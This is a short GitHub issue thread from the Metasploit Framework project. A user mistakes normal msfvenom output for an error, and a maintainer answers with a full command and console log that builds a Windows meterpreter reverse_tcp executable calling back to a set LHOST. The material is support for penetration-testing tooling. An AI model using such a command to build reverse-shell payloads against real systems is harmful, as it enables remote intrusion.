### ISSUE TITLE
error when putting "msfvenom -p windows/meterpreter/reverse_tcp LHOST=etc"

### ISSUE THREAD

**Issue by sergibolo** [rapid7/metasploit-framework#14989]
when I put it on it makes me:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
------------------------------------------------------------------------------------------------------------------------------
sorry for my english

**Comment by bcoles** [comment]
```
[2021-04-02 04:52:08] root@kali:~/Desktop/metasploit-framework# ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.115 -o file.exe -f exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: file.exe
[2021-04-02 04:52:19] root@kali:~/Desktop/metasploit-framework# file file.exe
file.exe: PE32 executable (GUI) Intel 80386, for MS Windows
```

For more info, see:

* https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

**Comment by adfoster-r7** [comment]
Closing this as it looks like this question has been answered, thanks bcoles! :+1:
